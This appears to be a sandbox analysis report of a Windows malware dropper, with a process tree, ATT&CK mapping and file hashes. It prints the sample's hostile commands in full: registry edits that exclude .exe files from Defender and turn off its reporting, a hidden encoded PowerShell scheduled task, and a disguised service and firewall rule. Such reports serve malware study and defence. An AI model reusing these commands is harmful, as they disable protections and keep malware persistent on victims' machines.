"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
10⤵
PID:3216

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
11⤵
PID:5964

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
12⤵
PID:5444

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
12⤵
PID:5192

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
10⤵
PID:5944

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
11⤵
PID:4796

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
12⤵
PID:5632

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
12⤵
PID:5148

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gwklAOCiU" /SC once /ST 06:40:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
10⤵
- Creates scheduled task(s)
PID:3484

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gwklAOCiU"
10⤵
PID:5028

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gwklAOCiU"
10⤵
PID:4680

C:\Users\Admin\Pictures\Adobe Films\Qr9x5nOZWi_lDgCxtgExM6Xf.exe
"C:\Users\Admin\Pictures\Adobe Films\Qr9x5nOZWi_lDgCxtgExM6Xf.exe"
7⤵
PID:1428

C:\Users\Admin\Pictures\Adobe Films\txtQabKHHgnk1PNqukvGeOEM.exe
"C:\Users\Admin\Pictures\Adobe Films\txtQabKHHgnk1PNqukvGeOEM.exe"
7⤵
PID:1008

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1008 -s 836
8⤵
- Program crash
PID:5844

C:\Users\Admin\Pictures\Adobe Films\3A5tRAyE7sIteKC0IQnsP_cn.exe
"C:\Users\Admin\Pictures\Adobe Films\3A5tRAyE7sIteKC0IQnsP_cn.exe"
7⤵
PID:2292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2292 -s 616
8⤵
- Program crash
PID:5740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2292 -s 624
8⤵
- Program crash
PID:4416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2292 -s 652
8⤵
- Program crash
PID:5444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2292 -s 808
8⤵
- Program crash
PID:3048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2292 -s 772
8⤵
- Program crash
PID:2264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2292 -s 876
8⤵
- Program crash
PID:6140

C:\Users\Admin\Pictures\Adobe Films\_0VZPnVHhwFMoPvi4bRUjuSz.exe
"C:\Users\Admin\Pictures\Adobe Films\_0VZPnVHhwFMoPvi4bRUjuSz.exe"
7⤵
PID:1724

C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr1649.exe
"C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr1649.exe"
8⤵
PID:5132

C:\Users\Admin\AppData\Local\Temp\HCI14M7HLMHLCME.exe
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="https://institutohood.edu.ar/webArg8.txt">here</a>.</p> </body></html>
9⤵
PID:5960

C:\Users\Admin\AppData\Local\Temp\xli.exe
"C:\Users\Admin\AppData\Local\Temp\xli.exe"
8⤵
PID:3152

C:\Users\Admin\AppData\Local\Temp\xli.exe
"C:\Users\Admin\AppData\Local\Temp\xli.exe" -h
9⤵
PID:5688

C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe
"C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe"
8⤵
PID:5024

C:\Users\Admin\AppData\Local\Temp\6ab58ab8-e7ac-4197-83d1-274d67e76799.exe
"C:\Users\Admin\AppData\Local\Temp\6ab58ab8-e7ac-4197-83d1-274d67e76799.exe"
9⤵
PID:3056

C:\Users\Admin\AppData\Local\Temp\po50.exe
"C:\Users\Admin\AppData\Local\Temp\po50.exe"
8⤵
PID:5524

C:\Users\Admin\AppData\Local\Temp\siww1049.exe
"C:\Users\Admin\AppData\Local\Temp\siww1049.exe"
8⤵
PID:808

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 808 -s 864
9⤵
- Program crash
PID:524

C:\Users\Admin\AppData\Local\Temp\pub1.exe
"C:\Users\Admin\AppData\Local\Temp\pub1.exe"
8⤵
PID:4732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9vix9vc4.8iw.bat""
9⤵
PID:5796

C:\Windows\system32\timeout.exe
timeout 3
10⤵
- Delays execution with timeout.exe
PID:1704

C:\ProgramData\BCleaner Software\BCleaner Software.exe
"C:\ProgramData\BCleaner Software\BCleaner Software.exe"
10⤵
PID:4836

C:\ProgramData\BCleaner Software\BCleaner Update Worker.exe
"C:\ProgramData\BCleaner Software\BCleaner Update Worker.exe"
10⤵
PID:2376

C:\Users\Admin\AppData\Local\Temp\r5fbkwm4.ql8.exe
"C:\Users\Admin\AppData\Local\Temp\r5fbkwm4.ql8.exe"
11⤵
PID:3436

C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe
"C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe"
8⤵
PID:3988

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
8⤵
PID:4380

C:\Users\Admin\AppData\Local\Temp\is-99M19.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-99M19.tmp\setup.tmp" /SL5="$40280,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe"
9⤵
PID:3700

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
10⤵
PID:6048

C:\Users\Admin\AppData\Local\Temp\is-RLILG.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RLILG.tmp\setup.tmp" /SL5="$1029A,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
11⤵
PID:5572

C:\Users\Admin\AppData\Local\Temp\inst200.exe
"C:\Users\Admin\AppData\Local\Temp\inst200.exe"
8⤵
PID:2240

C:\Users\Admin\AppData\Local\Temp\ip.exe
"C:\Users\Admin\AppData\Local\Temp\ip.exe"
8⤵
PID:5420

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
9⤵
PID:1432

C:\Users\Admin\AppData\Local\Temp\7zS4029.tmp\Install.exe
.\Install.exe
10⤵
PID:5396

C:\Users\Admin\AppData\Local\Temp\7zS549C.tmp\Install.exe
.\Install.exe /S /site_id "745794"
11⤵
PID:2092

C:\Users\Admin\AppData\Local\Temp\udontsay.exe
"C:\Users\Admin\AppData\Local\Temp\udontsay.exe"
8⤵
PID:5940

C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"
8⤵
PID:1692

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe
"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe"
8⤵
PID:4944

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\XEB0.Cpl",
9⤵
PID:4448

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\XEB0.Cpl",
10⤵
PID:2692

C:\Users\Admin\AppData\Local\Temp\anytime1.exe
"C:\Users\Admin\AppData\Local\Temp\anytime1.exe"
8⤵
PID:1564

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1564 -s 1672
9⤵
- Program crash
PID:3512

C:\Users\Admin\AppData\Local\Temp\anytime2.exe
"C:\Users\Admin\AppData\Local\Temp\anytime2.exe"
8⤵
PID:3048

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3048 -s 1688
9⤵
- Program crash
PID:1496

C:\Users\Admin\AppData\Local\Temp\anytime3.exe
"C:\Users\Admin\AppData\Local\Temp\anytime3.exe"
8⤵
PID:2216

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2216 -s 1704
9⤵
- Program crash
PID:5464

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe
"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"
8⤵
PID:5164

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5164 -s 1688
9⤵
- Program crash
PID:2412

C:\Users\Admin\Documents\mN0k00SdRwavvkQ7x66BxjkN.exe
"C:\Users\Admin\Documents\mN0k00SdRwavvkQ7x66BxjkN.exe"
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1452

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 45
6⤵
PID:60

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4340

C:\Windows\SysWOW64\timeout.exe
timeout 45
7⤵
- Delays execution with timeout.exe
PID:1444

C:\Users\Admin\AppData\Local\Temp\Ftbxknprim.exe
"C:\Users\Admin\AppData\Local\Temp\Ftbxknprim.exe"
6⤵
PID:4776

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
6⤵
PID:808

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
6⤵
PID:5200

C:\Users\Admin\Documents\02R3Nlw1e1hFW0CtOG2CO2Wu.exe
"C:\Users\Admin\Documents\02R3Nlw1e1hFW0CtOG2CO2Wu.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
PID:1456

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\bgvivvju\
6⤵
PID:2236

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\bhpxckzo.exe" C:\Windows\SysWOW64\bgvivvju\
6⤵
PID:60

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create bgvivvju binPath= "C:\Windows\SysWOW64\bgvivvju\bhpxckzo.exe /d\"C:\Users\Admin\Documents\02R3Nlw1e1hFW0CtOG2CO2Wu.exe\"" type= own start= auto DisplayName= "wifi support"
6⤵
PID:2976

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description bgvivvju "wifi internet conection"
6⤵
PID:3932

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start bgvivvju
6⤵
PID:1460

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
6⤵
PID:2292

C:\Users\Admin\gxyactib.exe
"C:\Users\Admin\gxyactib.exe" /d"C:\Users\Admin\Documents\02R3Nlw1e1hFW0CtOG2CO2Wu.exe"
6⤵
PID:4380

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\xxejpiro.exe" C:\Windows\SysWOW64\bgvivvju\
7⤵
- Blocklisted process makes network request
- Executes dropped EXE
PID:2836

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config bgvivvju binPath= "C:\Windows\SysWOW64\bgvivvju\xxejpiro.exe /d\"C:\Users\Admin\gxyactib.exe\""
7⤵
PID:5200

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start bgvivvju
7⤵
PID:5344

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
7⤵
PID:5472

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6455.bat" "
7⤵
PID:5760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4380 -s 1044
7⤵
- Program crash
PID:5952

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1456 -s 1044
6⤵
- Program crash
PID:5092

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c jobiea_6.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:5056

C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\jobiea_6.exe
jobiea_6.exe
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1432

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c jobiea_5.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4040

C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\jobiea_5.exe
jobiea_5.exe
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4072

C:\Users\Admin\AppData\Local\Temp\is-OFEEK.tmp\jobiea_5.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OFEEK.tmp\jobiea_5.tmp" /SL5="$601D8,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\jobiea_5.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4308

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c jobiea_4.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4144

C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\jobiea_4.exe
jobiea_4.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1340

C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\jobiea_4.exe
C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\jobiea_4.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4848

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c jobiea_3.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:368

C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\jobiea_3.exe
jobiea_3.exe
4⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2996

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c jobiea_2.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4132

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c jobiea_1.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3716 -s 584
3⤵
- Program crash
PID:4352

C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\jobiea_2.exe
jobiea_2.exe
1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3716 -ip 3716
1⤵
PID:1220

C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\jobiea_1.exe
jobiea_1.exe
1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4480

C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\jobiea_1.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\jobiea_1.exe" -a
2⤵
- Executes dropped EXE
PID:208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1868 -ip 1868
1⤵
PID:3152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1512 -ip 1512
1⤵
PID:3924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5064 -ip 5064
1⤵
PID:3932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1868 -ip 1868
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of SetThreadContext
PID:444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1512 -ip 1512
1⤵
PID:3056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1512 -ip 1512
1⤵
PID:4924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1456 -ip 1456
1⤵
PID:1548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1512 -ip 1512
1⤵
PID:540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1512 -ip 1512
1⤵
PID:5284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2292 -ip 2292
1⤵
PID:5488

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 556 -p 1008 -ip 1008
1⤵
PID:5724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4380 -ip 4380
1⤵
PID:5768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2292 -ip 2292
1⤵
PID:6088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1512 -ip 1512
1⤵
PID:2140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2292 -ip 2292
1⤵
PID:1020

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1512 -ip 1512
1⤵
PID:3304

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:3676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2292 -ip 2292
1⤵
PID:5308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1512 -ip 1512
1⤵
PID:3644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2292 -ip 2292
1⤵
PID:5028

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1512 -ip 1512
1⤵
PID:5936

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2292 -ip 2292
1⤵
PID:6136

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 604 -p 808 -ip 808
1⤵
PID:2296

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
PID:1872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5744

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 616 -p 3048 -ip 3048
1⤵
PID:5056

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 572 -p 2216 -ip 2216
1⤵
PID:5992

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 548 -p 1564 -ip 1564
1⤵
PID:3624

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 524 -p 5164 -ip 5164
1⤵
PID:4444

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:1896

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
2⤵
PID:3880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3880 -ip 3880
1⤵
PID:532

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
MD5
54e9306f95f32e50ccd58af19753d929

SHA1
eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

SHA256
45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

SHA512
8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
MD5
6f0176119f738f3870c082e420192c62

SHA1
3180811073df6c2bc4d63af16103a3d153b47728

SHA256
4655be619021bdf2c80ffb4bdf603ec2276fcc8d7584200a14aa8dcec519a495

SHA512
521b545848125ab9d9c6b0354afeace8543a445d670265fd0d6b58936ed17fb39220c578d9e4fe3d412a1df2a7e03d8cb9b1293f31b62feecdf48ae76c3d525f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jobiea_4.exe.log
MD5
e5352797047ad2c91b83e933b24fbc4f

SHA1
9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772

SHA256
b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c

SHA512
dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\jobiea_1.exe
MD5
3263859df4866bf393d46f06f331a08f

SHA1
5b4665de13c9727a502f4d11afb800b075929d6c

SHA256
9dcacda3913e30cafd92c909648b5bffde14b8e39e6adbfb15628006c0d4d3c2

SHA512
58205110a017f5d73dd131fefb1e3bbbcc670ed0c645aeefebe5281579c7b1dceffa56671cd7b186554bdb81710e21018ed0d7088a27517dfc5e48d6d3578cf6

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\jobiea_1.exe
MD5
3263859df4866bf393d46f06f331a08f

SHA1
5b4665de13c9727a502f4d11afb800b075929d6c

SHA256
9dcacda3913e30cafd92c909648b5bffde14b8e39e6adbfb15628006c0d4d3c2

SHA512
58205110a017f5d73dd131fefb1e3bbbcc670ed0c645aeefebe5281579c7b1dceffa56671cd7b186554bdb81710e21018ed0d7088a27517dfc5e48d6d3578cf6

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\jobiea_1.txt
MD5
3263859df4866bf393d46f06f331a08f

SHA1
5b4665de13c9727a502f4d11afb800b075929d6c

SHA256
9dcacda3913e30cafd92c909648b5bffde14b8e39e6adbfb15628006c0d4d3c2

SHA512
58205110a017f5d73dd131fefb1e3bbbcc670ed0c645aeefebe5281579c7b1dceffa56671cd7b186554bdb81710e21018ed0d7088a27517dfc5e48d6d3578cf6

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\jobiea_2.exe
MD5
202c4aba9ceac300af569a9883c2bd24

SHA1
02a5c183c8a5c6d807cde14ebfcae21966ca0ec1

SHA256
041b1fcf198b9dfa3328c7b7a96769eb59ee847b9f8eba39d2399c3e67c8cfbf

SHA512
f8e30804a42056d45acef630a976c3d33e380ce6c7bf36f63f2d8a791c7fac6aebe2e9b4d75005a5d0a42f720bd0fb6accec485f4d6e19a054a56acaced80a75

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\jobiea_2.txt
MD5
202c4aba9ceac300af569a9883c2bd24

SHA1
02a5c183c8a5c6d807cde14ebfcae21966ca0ec1

SHA256
041b1fcf198b9dfa3328c7b7a96769eb59ee847b9f8eba39d2399c3e67c8cfbf

SHA512
f8e30804a42056d45acef630a976c3d33e380ce6c7bf36f63f2d8a791c7fac6aebe2e9b4d75005a5d0a42f720bd0fb6accec485f4d6e19a054a56acaced80a75

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\jobiea_3.exe
MD5
52affcb38ab779184894fe99cdb9e9da

SHA1
57735a35edea5e38924004b91a016bcf793352c9

SHA256
9e1344c4bb63869a8dde332e6625f04707bc01bd63679b886c998a8f5c4407f7

SHA512
c8d544cc949e43b0b63ba1a04dbe70542323c7684814158aa71bd096cc10d26c25abef87af14bd7fcf31c8050d58d5efb7d0fca9f04c15fc49d185c43be2263f

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\jobiea_3.txt
MD5
52affcb38ab779184894fe99cdb9e9da

SHA1
57735a35edea5e38924004b91a016bcf793352c9

SHA256
9e1344c4bb63869a8dde332e6625f04707bc01bd63679b886c998a8f5c4407f7

SHA512
c8d544cc949e43b0b63ba1a04dbe70542323c7684814158aa71bd096cc10d26c25abef87af14bd7fcf31c8050d58d5efb7d0fca9f04c15fc49d185c43be2263f

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0FBDBD7D\jobiea_4.exe
MD5
5faf798cb2de39f6dc33b66e2c3ef4fb

SHA1
b32d9a7a0d37891c4d383c9fba47aef8b6016073

SHA256
d0fa72ab2b8bf4e811ef47a795a4d464af7ad4782c57324617e738bcda9fa397

SHA512
38a699f52720b3f4888ef3a82e678c3bdce09808f5e9c2b4180da46a6a37db38e54fa8800ea51b31628c2954bc35d090f949bb7953cab36d37b4f89b091f0bb5

Download Submit
